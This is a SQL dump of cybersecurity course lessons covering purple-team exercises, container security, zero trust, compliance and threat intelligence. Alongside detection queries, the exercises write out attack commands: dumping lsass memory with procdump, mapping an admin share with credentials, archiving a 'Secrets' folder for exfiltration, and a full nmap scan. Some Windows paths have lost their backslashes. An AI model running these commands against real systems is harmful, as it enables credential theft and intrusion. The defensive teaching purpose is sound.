(684, 405, '## Adversary Emulation\n\nRather than \"Generic Hacking\", we emulate specific Threat Groups.\n\n### Why?\n*   If you are a Bank, you care about **Carbanak**.\n*   If you are a Hospital, you care about **Ryuk**.\n\n### Tools\n1.  **Atomic Red Team (Red Canary)**: A library of simple scripts to test one technique.\n    *   `atomic-red-team.exe T1003` -> Runs a safe mimikatz command.\n2.  **CALDERA (MITRE)**: Automated adversary emulation platform.\n    *   Build a \"Profile\" (e.g., APT29).\n    *   Click \"Start\".\n    *   Caldera agents connect to C2 and execute the APT29 commands automatically.\n\n### The Value\nIt proves resilience against *relevant* threats.\n\"We know we can stop script kiddies. But can we stop the group that hacked our competitor last week?\"', 'markdown', 20, '2025-12-27 02:22:24', '2025-12-29 16:15:03'),
(685, 406, '## Module 40 Review\n*   **Red**: Attack.\n*   **Blue**: Defend.\n*   **Purple**: Collaborate.\n*   Adversary Emulation ensures your defense is relevant to real-world threats.\n\nNext: Running a Purple Team exercise step-by-step.', 'markdown', 20, '2025-12-27 02:22:24', '2025-12-29 14:23:36'),
(686, 411, '## Exercise Framework Setup\n\nTo run a Purple Team exercise in your lab or company, you don\'t need expensive tools.\n\n### 1. The Target\nA standard Windows 10/11 VM.\n*   **Requirement**: It must have logging enabled (Sysmon) and forwarding to your SIEM.\n\n### 2. The Attack Tool\n**Atomic Red Team** is the gold standard for beginners.\n*   It is a folder of YAML files.\n*   Each file contains a command (PowerShell/CMD).\n*   No C2 infrastructure needed. It runs locally.\n\n### 3. The Execution\n*   Install `Invoke-AtomicRedTeam` (PowerShell module).\n*   Command: `Invoke-AtomicTest T1003 -CheckPrereqs`\n*   Command: `Invoke-AtomicTest T1003` (Runs the attack).\n\n### 4. The Tracker\nUse a spreadsheet (VECTR is a good free tool, but Excel works).\n*   Columns: Technique | Status | Detected? | Blocked? | Notes.\n*   Fill it out as you go.', 'markdown', 20, '2025-12-27 02:26:00', '2025-12-29 16:15:03'),
(687, 412, '## Exercise: Credential Dumping (T1003)\n\n**Objective**: Detect extraction of passwords from memory.\n\n### The Attack (Atomic T1003.001)\n*   **Command**: `procdump -ma lsass.exe lsass_dump.dmp`\n*   **Context**: `lsass.exe` (Local Security Authority Subsystem Service) holds active credentials in RAM.\n*   **Tool**: Sysinternals ProcDump (legitimate Microsoft tool).\n\n### The Detection\n1.  **Process Name**: `procdump.exe` or `procdump64.exe`.\n2.  **Target Process**: `lsass.exe`.\n3.  **Command Line**: Contains `lsass`.\n\n### SIEM Search (Splunk)\n`index=windows EventCode=10 TargetImage=\"*lsass.exe\" GrantedAccess=\"0x1F0FFF\"`\n(Event 10 is Process Access. 0x1F0FFF is Full Access).\n\n### The Fix\nIf you missed it:\n1.  Install Sysmon.\n2.  Configure Sysmon to log Event ID 10 for Target `lsass.exe`.\n3.  Ingest logs.', 'markdown', 20, '2025-12-27 02:26:00', '2025-12-29 16:15:03'),
(688, 413, '## Exercise: Lateral Movement (T1021)\n\n**Objective**: Detect movement between machines using SMB/Windows Admin Shares.\n\n### The Attack (Atomic T1021.002)\n*   **Command**: `net use \\TargetIPC$ /user:Admin Pa$$word`\n*   **Context**: Mapping the C: drive of a remote computer.\n\n### The Detection\n1.  **Event ID**: 4624 (Logon) Type 3 (Network).\n2.  **Event ID**: 5140 (Share Access).\n3.  **Share Name**: `\\*C$`, `\\*ADMIN$`, `\\*IPC$`.\n\n### SIEM Search\n`index=windows EventCode=5140 ShareName=\"*C$\" AccountName!=\"*$\" `\n(Exclude computer accounts ending in $).\n\n### Analysis\nWhy is \"Mary\" mapping the C$ drive of \"Bob\"?\n*   If Mary is HelpDesk -> Maybe okay.\n*   If Mary is HR -> **Malicious**.', 'markdown', 20, '2025-12-27 02:26:00', '2025-12-29 16:15:03'),
(689, 414, '## Exercise: Data Exfiltration (T1048)\n\n**Objective**: Detect data leaving the network.\n\n### The Attack\n*   **Command**: Compress a folder into a ZIP and send it to an external FTP/HTTP server.\n*   **Atomic**: `7z a -t7z -mx=9 stolen_data.7z C:UsersPublicSecrets*`\n\n### The Detection\n1.  **Archiving**: Event 4688 (Process Create) -> `7z.exe` or `rar.exe` or `tar.exe`.\n    *   *Suspicious*: Running from a Temp directory.\n2.  **Network**: Firewall allow log to a non-business IP.\n    *   High Upload volume (> 10 MB).\n\n### SIEM Search\n`index=firewall action=allow bytes_out > 10000000 dest_port NOT IN (80, 443)`\n(Looking for FTP, SSH, or odd ports).\n\n### The Fix\n*   Block outbound connections on servers by default.\n*   Alert on large archive creation.', 'markdown', 20, '2025-12-27 02:26:00', '2025-12-29 16:15:03'),
(690, 415, '## Metrics & Reporting\n\nHow do you prove Purple Teaming works?\n\n### The Scorecard\n*   **Detection Rate**: \"We detected 5/10 attacks (50%).\" -> \"Next month: 8/10 (80%).\"\n*   **Data Quality**: \"We had logs for 9/10 attacks, but no rule.\"\n*   **Alert Fidelity**: \"We had an alert, but it was classified as \'Info\' instead of \'Critical\'.\"\n\n### The Executive Report\n\"We simulated a Ransomware attack.\n*   Result: We successfully blocked execution.\n*   Gap: It took us 4 hours to detect the initial phishing email.\n*   Plan: Tune email gateway filter.\"\n\nThis creates a dashboard of **Continuous Improvement**.', 'markdown', 20, '2025-12-27 02:26:00', '2025-12-29 16:15:03'),
(691, 416, '## Module 41 Review\nYou simulated an attack chain:\n*   Credentials Stolen -> Lateral Movement -> Exfiltration.\n*   You validated detections.\n\nNext: Modern security in Containers and Cloud.', 'markdown', 20, '2025-12-27 02:26:00', '2025-12-29 14:23:36'),
(692, 421, '## Container Security Fundamentals\n\n\"But it works on my machine!\" - The Developer.\n\n### What is a Container?\nA container (Docker) is a lightweight package of software that includes everything needed to run it: code, runtime, system tools, libraries.\n*   **Advantage**: Portability. It runs the same on a laptop as in the cloud.\n*   **Difference from VM**: It shares the **Host Kernel**. A VM has its own Kernel.\n    *   *Security Implication*: If you escape a VM, you hit the Hypervisor. If you escape a Container, you are on the Host Linux OS root.\n\n### The Attack Surface\n1.  **The Image**: Is the software (Nginx, Python) vulnerable?\n2.  **The Registry**: Where do you download images from? (Docker Hub).\n3.  **The Orchestrator**: Kubernetes (K8s) configuration.\n4.  **The Runtime**: The Docker daemon running on the host.\n\n### Ephemeral Nature\nContainers live for minutes.\n*   **SOC Nightmare**: \"Alert: TCP scan from Container ID a1b2c3d4.\"\n*   Analyst checks 10 minutes later. Container a1b2c3d4 is gone. Deleted.\n*   *Solution*: You need specialized Container Security tools that log events *instantly* to a central database.', 'markdown', 20, '2025-12-27 02:27:22', '2025-12-29 16:15:13'),
(693, 422, '## Docker Security Hardening\n\nDocker is not secure by default.\n\n### 1. Rootless Mode\n*   **Risk**: By default, the Docker daemon runs as **root**.\n*   **Fix**: Configure Docker to run in \"Rootless Mode\" (User Namespace Remapping).\n*   *Why*: If a hacker breaks out of the container, they are \"nobody\" on the host, not \"root\".\n\n### 2. Capabilities (Linux Capabilities)\n*   Linux decomposes \"Root\" privileges into small slices (CAP_NET_ADMIN, CAP_SYS_BOOT, etc.).\n*   **Hardening**: Drop all capabilities, then add back only what you need.\n    *   `docker run --cap-drop=all --cap-add=NET_BIND_SERVICE ...`\n\n### 3. Read-Only Filesystem\n*   Containers should be **Immutable**. You shouldn\'t patch a running container; you deploy a new one.\n*   **Flag**: `--read-only`.\n*   *Why*: Attackers cannot download malware or modify `/etc/passwd`.\n\n### 4. Do not expose the Docker Socket\n*   `/var/run/docker.sock` is the API key to the kingdom. If you mount this into a container, that container has full root control over the host.\n*   **Rule**: Never mount the socket unless absolutely necessary (e.g., for a monitoring agent).', 'markdown', 20, '2025-12-27 02:27:22', '2025-12-29 16:15:13'),
(694, 423, '## Kubernetes Security (K8s)\n\nKubernetes manages thousands of containers. It is complex (\"K8s is hard\").\n\n### 1. The API Server\nThe brain of K8s. Port 6443.\n*   **Attack**: If this is open to the internet with no auth, anyone can delete your cluster.\n*   **Fix**: Private access only.\n\n### 2. RBAC (Role-Based Access Control)\n*   **Service Accounts**: Every pod has an identity.\n*   **Risk**: Default Service Account often has too many permissions.\n*   **Fix**: Create specific ServiceAccounts. \"This Web Pod can ONLY talk to the Database Pod.\"\n\n### 3. Pod Security Standards (PSS)\n*   **Privileged Pods**: A pod with `privileged: true` is basically a root shell on the host.\n*   **Policy**: Use OPA Gatekeeper or Kyverno to **Block** any deployment that asks for `privileged: true`.\n\n### 4. Network Policies\n*   By default, in K8s, **all pods can talk to all pods**. (Flat network).\n*   **Attack**: Hacker compromises Web Pod. Moves laterally to Database Pod easily.\n*   **Fix**: Implement Network Policies (Firewall rules) to deny traffic by default.', 'markdown', 20, '2025-12-27 02:27:22', '2025-12-29 16:15:13'),
(695, 424, '## Container Image Security\n\n\"Supply Chain Security.\"\n\n### Scanning Images\nBefore you deploy, scan the image.\n*   **Tools**: Trivy, Grype, Clair.\n*   **Process**: CI/CD Pipeline.\n    *   Developer commits code.\n    *   Jenkins builds image.\n    *   Trivy scans image.\n    *   If `Critical Vulnerabilities > 0`: **Fail Build**. (Do not deploy).\n    *   Else: Deploy.\n\n### Minimal Base Images\n*   **Bloat**: Using `ubuntu:latest` (700MB) includes Curl, Wget, Netcat, Grep. Hackers love these tools (\"Living off the Land\").\n*   **Minimal**: Using `alpine` (5MB) or Google `distroless`.\n    *   Contains *only* the application binary. No Shell. No Curl.\n    *   *Result*: Beating the hacker by removing their weapons.\n\n### Signing Images (Notary)\nHow do you know this image actually came from your developer and wasn\'t injected by a hacker?\n*   **Cosign / Notary**: Digitally sign images. Kubernetes verifies the signature before running.', 'markdown', 20, '2025-12-27 02:27:22', '2025-12-29 16:15:13'),
(696, 425, '## Runtime Protection\n\nScanning images is \"Static\". We also need \"Dynamic\" protection (EDR for Containers).\n\n### Falco (The Runtime Camera)\n**Falco** is an open-source tool (CNCF) that watches the Kernel.\n*   **Rule**: \"Alert if a Shell is spawned in a container.\"\n*   **Rule**: \"Alert if a container modifies `/etc/shadow`.\"\n*   **Rule**: \"Alert if a container connects to a crypto-mining pool.\"\n\n### Sidecars\nSecurity tools often run as a \"Sidecar\" container next to the main app container in the same Pod. They share the network view and can inspect localhost traffic.\n\n### eBPF (Extended Berkeley Packet Filter)\nThe modern magic technology.\n*   allows running sandboxed programs in the Linux Kernel without changing kernel source code.\n*   **Cilium / Tetragon**: Uses eBPF to monitor network and process execution with near-zero performance overhead.\n*   This is the future of Linux security.', 'markdown', 20, '2025-12-27 02:27:22', '2025-12-29 16:15:13'),
(697, 426, '## Module 42 Review\n*   **Containers**: Shared Kernel = High Risk.\n*   **Roots**: Avoid running as Root.\n*   **Images**: Scan before you run.\n*   **Runtime**: Watch for drift and shells (`Falco`).\n\nNext: Zero Trust (The modern architecture).', 'markdown', 20, '2025-12-27 02:27:22', '2025-12-29 14:24:24'),
(698, 431, '## Zero Trust Principles\n\n\"Never Trust. Always Verify.\"\n\n### The Old Model: Castle and Moat\n*   Hard shell (Firewall). Soft gooey center (Internal Network).\n*   If you VPN in, you are \"Trusted\". You can access everything.\n\n### The Zero Trust Model\n*   Assume the network is **Hostile**.\n*   Assume the attacker is **already inside**.\n*   Therefore: Verify *every single request*.\n    1.  **Identity**: Who are you? (MFA).\n    2.  **Device**: Is your laptop patched? (Health).\n    3.  **Context**: Are you in a weird location?\n    4.  **Resource**: Do you need access to *this specific* file?\n\n### Pillars of Zero Trust (CISA)\n1.  **Identity**: Users.\n2.  **Devices**: Endpoints.\n3.  **Network**: Segmentation.\n4.  **Applications**: Workloads.\n5.  **Data**: Encryption/Tagging.', 'markdown', 20, '2025-12-27 02:28:42', '2025-12-29 16:15:13'),
(699, 432, '## Identity as the Perimeter\n\nThe new firewall is the Login Screen.\n\n### Authentication vs Authorization\n*   **AuthN**: Who are you? (MFA).\n*   **AuthZ**: What can you do? (Roles).\n\n### The Signal\nZero Trust creates a \"Risk Signal\" based on context:\n*   **User**: Is Bob.\n*   **Device**: Corporate Laptop (Managed).\n*   **Location**: Office IP.\n*   **Behavior**: Normal hours.\n*   **Result**: Allow Access.\n\n*   **Change**: Bob logs in from an unmanaged iPad in Russia.\n*   **Result**: Block (even if password is correct).', 'markdown', 20, '2025-12-27 02:28:42', '2025-12-29 14:24:24'),
(700, 433, '## Microsegmentation\n\nThe technique to stop Lateral Movement.\n\n### Concept\nInstead of one big \"Internal\" VLAN, break the network into tiny islands.\n*   **Macro-Segmentation**: VLANs. (HR, Finance, IT).\n*   **Micro-Segmentation**: Host-level firewalls.\n    *   \"Server A can talk to Server B on Port 443.\"\n    *   \"Server A can talk to Server C on Port 3306.\"\n    *   \"Server A **cannot** talk to Server D.\"\n\n### Implementation\n1.  **Tagging**: Map the application flow. \"Web calls App calls DB\".\n2.  **Policy**: Write \"Allow\" rules for valid flows.\n3.  **Default Deny**: Block everything else.\n\n### The Effect\nIf an attacker compromises the Web Server, they are trapped in a small padded cell. They cannot scan the network (blocked). They cannot SSH to the DB (blocked).', 'markdown', 20, '2025-12-27 02:28:42', '2025-12-29 16:15:13'),
(701, 434, '## Continuous Verification\n\nTrust is ephemeral.\n\n### Posture Checks\nBefore granting access, check the device health.\n*   Is the OS patched?\n*   Is EDR running?\n*   Is Disk Encrypted?\nIf NO -> Quarantine the device until fixed.\n\n### Session Times\n*   **Old**: Login lasts 30 days.\n*   **Zero Trust**: Login lasts 1 hour. Or 15 minutes for critical apps.\nRe-verify constantly.', 'markdown', 20, '2025-12-27 02:28:42', '2025-12-29 14:24:24');
INSERT INTO `lesson_content` (`id`, `task_id`, `content`, `content_type`, `reading_time_minutes`, `created_at`, `updated_at`) VALUES
(702, 435, '## Implementation\n\nHow do we actually build this?\n\n1.  **Define Protect Surface**: Identify the critical data (DAAS - Data, Assets, Applications, Services).\n2.  **Map Transaction Flows**: How does data move today? (Who talks to whom?).\n3.  **Build Policy**: Write the \"Allow\" rules based on business need.\n4.  **Monitor**: Watch logs.\n5.  **Enforce**: Turn on blocking mode.\n\n*Warning*: Don\'t turn on blocking on Day 1. You will break production.', 'markdown', 20, '2025-12-27 02:28:42', '2025-12-29 14:24:24'),
(703, 436, '## Module 43 Review\n*   **Identity**: The core control.\n*   **Context**: Time, Device, Location.\n*   **Segmentation**: Keeping zones small.\n\nNext: Compliance (The rules we must follow).', 'markdown', 20, '2025-12-27 02:28:42', '2025-12-29 14:24:24'),
(704, 441, '## Security Frameworks Overview\n\nWhy do we follow frameworks?\n1.  **Guidance**: Don\'t reinvent the wheel. Best practices exist.\n2.  **Compliance**: It\'s the law (or contract).\n3.  **Trust**: Customers trust you if you have a badge (ISO/SOC2).\n\n### Types\n*   **Regulatory**: HIPAA (Health), GDPR (Privacy). Essential.\n*   **Voluntary**: NIST CSF, CIS Controls. Best practice.', 'markdown', 20, '2025-12-27 02:30:07', '2025-12-29 14:24:24'),
(705, 442, '## NIST Cybersecurity Framework (CSF)\n\nThe gold standard for US organizations.\n\n### The 5 Functions\n1.  **Identify**: Asset Management, Risk Assessment. \"Know what you have.\"\n2.  **Protect**: Access Control, Awareness, Data Security. \"Lock the doors.\"\n3.  **Detect**: Anomalies, Monitoring. \"Install cameras.\"\n4.  **Respond**: Mitigation, Analysis. \"Call the fire department.\"\n5.  **Recover**: Planning, Improvements. \"Rebuild.\"\n\n*(2.0 added \"Govern\" as the 6th function).*', 'markdown', 20, '2025-12-27 02:30:07', '2025-12-29 14:24:24'),
(706, 443, '## ISO 27001 & 27002\n\nThe International Standard.\n\n### ISMS (Information Security Management System)\nISO 27001 focuses on the **Management System**, not just the tech.\n*   \"Do you have a process to identify risks?\"\n*   \"Do you have management support?\"\n*   \"Do you continuously improve?\"\n\n### Annex A (Controls)\nList of 114 specific controls (Access Control, Cryptography, Physical Security).\n*   You don\'t have to implement all 114, but you must explain why if you exclude one (Statement of Applicability - SOA).\n\n### Usage\n*   Common in Europe and Asia.\n*   Rigorous certification process.', 'markdown', 20, '2025-12-27 02:30:07', '2025-12-29 16:15:13'),
(707, 444, '## SOC 2 Compliance\n\n**SOC 2 (Service Organization Control 2)** is the gold standard for SaaS companies.\n\n### The Trust Services Criteria (TSC)\n1.  **Security** (Mandatory): Firewalls, IDS, MFA.\n2.  **Availability**: Uptime, DR.\n3.  **Processing Integrity**: Data is accurate.\n4.  **Confidentiality**: Encryption.\n5.  **Privacy**: Consents.\n\n### Type 1 vs Type 2\n*   **Type 1**: \"Design\". A snapshot in time. \"On Jan 1st, they had a firewall.\"\n*   **Type 2**: \"Operating Effectiveness\". Observation over 6-12 months. \"For the entire year, they kept the firewall running and reviewed logs daily.\"\n*   *Note*: Enterprise customers demand SOC 2 Type 2 reports.\n\n### The Analyst\'s Role\nEvidence Collection.\n*   Auditor: \"Prove you review access logs.\"\n*   Analyst: \"Here is the ticket #1234 where I reviewed the logs.\"', 'markdown', 20, '2025-12-27 02:30:07', '2025-12-29 16:15:13'),
(708, 445, '## PCI-DSS & HIPAA\n\n### PCI-DSS (Payment Card Industry Data Security Standard)\n*   **Scope**: Anyone protecting credit card numbers.\n*   **Rules**: Very technical.\n    *   \"Install a firewall.\"\n    *   \"Encrypt data in transit.\"\n    *   \"Use Anti-Virus.\"\n\n### HIPAA (Health Insurance Portability and Accountability Act)\n*   **Scope**: US Healthcare (Hospitals, Insurance).\n*   **Focus**: Protecting PHI (Personal Health Information).\n*   **Rule**: More flexible/vague than PCI, but huge fines for breaches.', 'markdown', 20, '2025-12-27 02:30:07', '2025-12-29 14:24:24'),
(709, 446, '## Module 44 Review\n*   **NIST CSF**: The operational guide (Identify -> Recover).\n*   **ISO 27001**: The management standard.\n*   **SOC 2**: The SaaS standard.\n*   **PCI/HIPAA**: The industry laws.\n\nYou have completed Path 4: Advanced SOC & Threat Hunting.\nYou are now ready to tackle the hardest challenges in Cyber Defense.', 'markdown', 20, '2025-12-27 02:30:07', '2025-12-29 14:24:24'),
(978, 765, '## What is Cyber Threat Intelligence?\n\n**Cyber Threat Intelligence (CTI)** is evidence-based knowledge, including context, mechanisms, indicators, implications, and action-oriented advice about an existing or emerging menace or hazard to assets.\n\nIn simpler terms: **CTI is the art of knowing your enemy.**\n\nIt transforms raw data into a narrative that helps you make better security decisions. It answers questions like:\n*   \"Who is attacking us?\"\n*   \"Why are they attacking us?\"\n*   \"How do they get in?\"\n*   \"What are they after?\"\n\n---\n\n### The Pyramid of Value\nTo understand CTI, you must understand the difference between Data, Information, and Intelligence.\n\n#### 1. Data (The Raw Material)\nData is simple, raw indicators. It has no context.\n*   **Example**: `IP Address: 192.168.1.5` or `Hash: a1b2c3d4...`\n*   **Value**: Low. Seeing an IP address tells you nothing about *why* it is there or if it is bad.\n\n#### 2. Information (Processed)\nInformation is data that has been aggregated or enriched. It answers \"What is this?\"\n*   **Example**: \"The IP `192.168.1.5` belongs to a known VPN provider and was seen scanning port 445 on our firewall.\"\n*   **Value**: Medium. You know what it is, but not if it\'s a targeted threat.\n\n#### 3. Intelligence (Actionable Insight)\nIntelligence is the analysis of information to provide specific direction. It answers \"What should we do?\"\n*   **Example**: \"APT29 is actively using the VPN IP `192.168.1.5` to exploit the Log4j vulnerability in financial institutions to deploy Cobalt Strike. **Recommendation**: Block this IP and patch Log4j immediately.\"\n*   **Value**: High. This captures the intent, the capability, and the necessary action.\n\n> 💡 **Key Takeaway**: If you cannot act on it, it is not intelligence; it is just news.\n\n---\n\n### Why Do We Need CTI?\nMany organizations operate in a functional \"Firefighting\" mode—reacting to alerts as they happen. CTI shifts this to a **Proactive** stance.\n\n#### 1. Proactive Defense (The \"Hunt\")\nInstead of waiting for the SIEM to beep, CTI tells us what to look for. If we know a specific ransomware group uses \"RDP Brute Force\" followed by \"PsExec\", we can go *look* for those signs before the ransomware is deployed.\n\n#### 2. Decision Advantage\nSecurity budgets are finite. CTI helps leaders decide where to spend money.\n*   *Without CTI*: \"We need to fix everything.\" (Impossible).\n*   *With CTI*: \"Our threat landscape is dominated by Phishing and Ransomware. We should invest 80% of our budget in Email Security and Offline Backups, and less on physical security.\"\n\n#### 3. Alert Triage\nA SOC Analyst sees 1,000 alerts a day. Which one matters?\nCTI provides the context. An alert for \"Powershell Execution\" might be normal for a SysAdmin. But CTI tells us: \"This specific Powershell command matches the exact syntax used by the Emotet Trojan.\" Suddenly, that alert becomes Priority 1.\n\n---\n\n### Case Study: The Target Breach (2013)\nOne of the most famous examples of failed intelligence.\n*   **The Attack**: Hackers compromised a third-party HVAC vendor just to get into Target\'s network.\n*   **The Warning**: FireEye (security vendor) detected the malware and flagged it.\n*   **The Failure**: Target\'s security team saw the alert but ignored it because they lacked the **Strategic Intelligence** to understand that retail was being aggressively targeted by POS (Point of Sale) RAM scrapers.\n*   **The Result**: 40 million credit cards stolen. CEO fired.\n*   **Lesson**: Detection tools are not enough. You need the intelligence to understand the *severity* and *context* of what you are seeing.\n\n---\n\n### Summary\n*   **Data** is raw numbers. **Information** is context. **Intelligence** is actionable advice.\n*   CTI moves you from **Reactive** (Firefighting) to **Proactive** (Hunting).\n*   The goal is to reduce risk and speed up response times.', 'markdown', NULL, '2025-12-29 13:30:44', '2025-12-29 13:41:22'),
(979, 766, '## The Intelligence Cycle\n\nIntelligence does not just \"happen.\" It is the result of a rigorous, repeatable process called the **Intelligence Cycle**. This 6-step loop ensures that the intel produced effectively meets the needs of the consumer.\n\n---\n\n### Phase 1: Direction (Planning)\nThis is the most critical phase. Before you collect a single log, you must ask: **\"What do we want to know?\"**\n*   **Defining Requirements**: We create **Intelligence Requirements (IRs)**.\n    *   *Bad IR*: \"Tell me about hackers.\" (Too vague).\n    *   *Good IR*: \"Is our organization vulnerable to the specific ransomware strains currently targeting the healthcare sector?\"\n*   **Stakeholders**: Who needs this? The CISO? The SOC? The Patch team?\n\n### Phase 2: Collection\nGathering the raw data to answer the question.\n*   **Internal Sources**: Firewall logs, EDR telemetry, SIEM events, past incident reports.\n*   **External Sources (OSINT)**: Twitter, Github, News reports, Pastebin.\n*   **Closed Sources**: Dark web forums, paid vendor feeds (e.g., CrowdStrike, Mandiant), ISACs (Information Sharing and Analysis Centers).\n\n### Phase 3: Processing\nRaw data is often unusable (messy, encrypted, or foreign language). Processing turns it into a readable format.\n*   **Normalization**: Converting 10 different log formats into one standard (like JSON or STIX).\n*   **Translation**: Translating Russian forum posts into English.\n*   **Decryption**: Decrypting malware configs.\n*   **Filtering**: Throwing away the noise (false positives) to focus on the signal.\n\n### Phase 4: Analysis\nThis is the \"Brain\" of the operation. Analysts connect the dots.\n*   **Correlation**: \"We saw this file hash in our network, and this report says it belongs to APT28.\"\n*   **Attribution**: \"Based on the TTPs, we assess with High Confidence this is a state-sponsored attack.\"\n*   **Assessment**: \"What does this mean for us?\" The analyst validates the truthfulness of the data and estimates the potential impact.\n*   **Structured Analytic Techniques (SATs)**: Methods like \"Analysis of Competing Hypotheses\" are used to avoid cognitive biases (like Confirmation Bias).\n\n### Phase 5: Dissemination\nDelivering the finished product to the right person, in the right format, at the right time.\n*   **Strategic**: A 1-page PDF summary for the CEO. (No technical jargon).\n*   **Tactical**: A machine-readable list of IOCs (STIX/TAXII) pushed directly to the Firewall.\n*   **Operational**: A detailed report on TTPs for the Threat Hunting team.\n*   **Rule of Thumb**: \"The right intel to the wrong person is useless.\"\n\n### Phase 6: Feedback\nThe cycle closes. Did we answer the question?\n*   \"Was this report helpful?\"\n*   \"Did it lead to a detection?\"\n*   \"Was it too late?\"\n*   Based on feedback, we adjust our **Direction** for the next cycle. If the SOC says \"These IOCs were all false positives,\" we need to change our Collection or Analysis phase.\n\n---\n\n### Summary\nThe cycle never stops. As threats evolve, our requirements change, and the wheel keeps turning.', 'markdown', NULL, '2025-12-29 13:30:45', '2025-12-29 13:41:22'),
(980, 767, '## Types of Threat Intelligence\n\nNot all intelligence is created equal. We categorize CTI into three (sometimes four) main types based on the **Consumer** (who reads it) and the **Horizon** (how long it matters).\n\n---\n\n### 1. Strategic Intelligence\n*   **Audience**: Executives, Board of Directors, CISO.\n*   **Focus**: High-level trends, financial risk, brand reputation, and geopolitics.\n*   **Time Horizon**: Long-term (Years).\n*   **Example Content**:\n    *   \"Ransomware attacks in our industry increased by 200% this quarter.\"\n    *   \"New regulations in the EU will impact our data privacy compliance.\"\n    *   \"The conflict in Region X increases the risk of nation-state cyber retaliation.\"\n*   **Goal**: To inform business decisions, budget allocation, and risk management. **No technical terms.**\n\n### 2. Operational Intelligence\n*   **Audience**: Security Managers, Threat Hunters, Incident Responders.\n*   **Focus**: **TTPs** (Tactics, Techniques, and Procedures). The \"How\" and \"Why\" of an attack.\n*   **Time Horizon**: Mid-term (Weeks to Months).\n*   **Example Content**:\n    *   \"APT29 is using a new technique to bypass Multi-Factor Authentication (MFA).\"\n    *   \"The \'Emotet\' botnet sends phishing emails with subject lines regarding invoices.\"\n    *   \"Adversaries are actively exploiting the PrintNightmare vulnerability.\"\n*   **Goal**: To update security posture, prioritize patching, and guide threat hunting.\n\n### 3. Tactical Intelligence\n*   **Audience**: SOC Analysts, SIEM Administrators, Automated Systems (Firewalls).\n*   **Focus**: **IOCs** (Indicators of Compromise). The specific artifacts left behind.\n*   **Time Horizon**: Short-term (Hours to Days).\n*   **Example Content**:\n    *   **IP Addresses**: `104.22.1.1`\n    *   **File Hashes**: `e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855`\n    *   **Domains**: `evil-phishing-site.com`\n*   **Goal**: Immediate detection and blocking. Tactical intel is often automated because it expires quickly (attackers change IPs cheaply).\n\n---\n\n### Comparison Table\n\n| Feature | Strategic | Operational | Tactical |\n| :--- | :--- | :--- | :--- |\n| **Consumer** | C-Suite / Board | SOC Mgr / Hunters | Analysts / Machines |\n| **Content** | Trends / Risk | TTPs / Campaigns | IOCs (Artifacts) |\n| **Lifespan** | Years | Weeks/Months | Hours/Days |\n| **Volume** | Low | Medium | High |\n| **Automated?** | Never | Rarely | Often |\n\n---\n\n### The \"Fourth\" Type: Technical Intelligence\nSome frameworks include a 4th type focused purely on technical tools and malware analysis results (e.g., \"This malware uses XOR encryption with key 0x55\"). This often blends into Operational/Tactical.\n\n### Scenario: The Ransomware Attack\n*   **Tactical**: The Firewall blocks 10 IPs associated with the C2 server.\n*   **Operational**: The Threat Hunter looks for the \"Double Pulsar\" exploit tool because they know this group uses it.\n*   **Strategic**: The CISO presents a report to the Board requesting $2M for offline backups because reliance on cloud sync is a strategic weakness against this specific threat actor.\n\nAll three types work together to protect the organization.', 'markdown', NULL, '2025-12-29 13:30:45', '2025-12-29 13:41:22'),
(981, 768, '## Module 1 Assessment\nPass this quiz to complete the module.', 'markdown', NULL, '2025-12-29 13:30:45', '2025-12-29 13:30:45'),
(982, 769, '## Open Source Intelligence (OSINT)\n\n**OSINT** is data collected from publicly available sources to be used in an intelligence context. \"Open Source\" does not mean \"Open Source Software\" (like Linux). It means **Publicly Accessible Information (PAI)**.\n\nIf it is on the internet and you can access it without hacking a password, it is OSINT.\n\n---\n\n### The OSINT Landscape\nOSINT is vast. It covers:\n1.  **The Surface Web**: Google, News, Company Websites. (4% of web).\n2.  **The Deep Web**: Content not indexed by Search Engines (Databases, Court Records, Wayback Machine).\n3.  **The Dark Web**: Networks requiring specific software (Tor/I2P) to access. Marketplace for stolen data.\n4.  **Social Media**: Twitter, LinkedIn, Instagram, Reddit.\n5.  **Technical Data**: DNS records, WHOIS, SSL Certificates, IP Geolocation.\n\n---\n\n### Passive vs Active Reconnaissance\nThis distinction keeps you out of jail.\n\n#### Passive Reconnaissance (Safe)\nGathering info **without** interacting directly with the target\'s systems.\n*   **Method**: You query Google, Shodan, or Whois.\n*   **Visibility**: The target sees traffic from Google/Shodan, not YOU.\n*   **Risk**: Near Zero.\n*   *Example*: Searching `site:target.com` on Google.\n\n#### Active Reconnaissance (Risky)\nGathering info by **touching** the target.\n*   **Method**: Port Scanning (Nmap), Vulnerability Scanning (Nessus), connecting to their web server.\n*   **Visibility**: Your IP address appears in their Firewall/Web logs.\n*   **Risk**: High. You can be blocked or flagged as an attacker.\n*   *Example*: Running `nmap -sS -p- target.com`.\n\n---\n\n### OPSEC: Operations Security\n\"If you stare into the abyss, the abyss stares back.\"\nWhen you research a Threat Actor or a malicious domain, you must assume they are watching their logs. If they see a request from \"My-Corporate-Laptop\", they know you are on to them.\n\n#### The Golden Rules of Intelligence OPSEC\n1.  **Never Use Your Real Identity**: Do not use your personal Gmail or corporate email to register for forums.\n2.  **Use a Sock Puppet**: A fake online persona.\n    *   *Name*: Generic but realistic.\n    *   *Photo*: AI Generated (thispersondoesnotexist.com) - avoid reverse image search hits.\n    *   *History*: An empty account looks suspicious. A good sock puppet has months of benign activity.\n3.  **Manage Attribution**:\n    *   **VPN**: Hides your IP.\n    *   **Tor**: Anonymizes your traffic (but beware, Tor exit nodes are public).\n    *   **Virtual Machines (VM)**: Always browse from a disposable VM (like Whonix or Kali). If you get infected, you just delete the VM.\n    *   **User Agents**: Spoof your browser string to blend in.', 'markdown', NULL, '2025-12-29 13:30:45', '2025-12-29 13:43:25'),
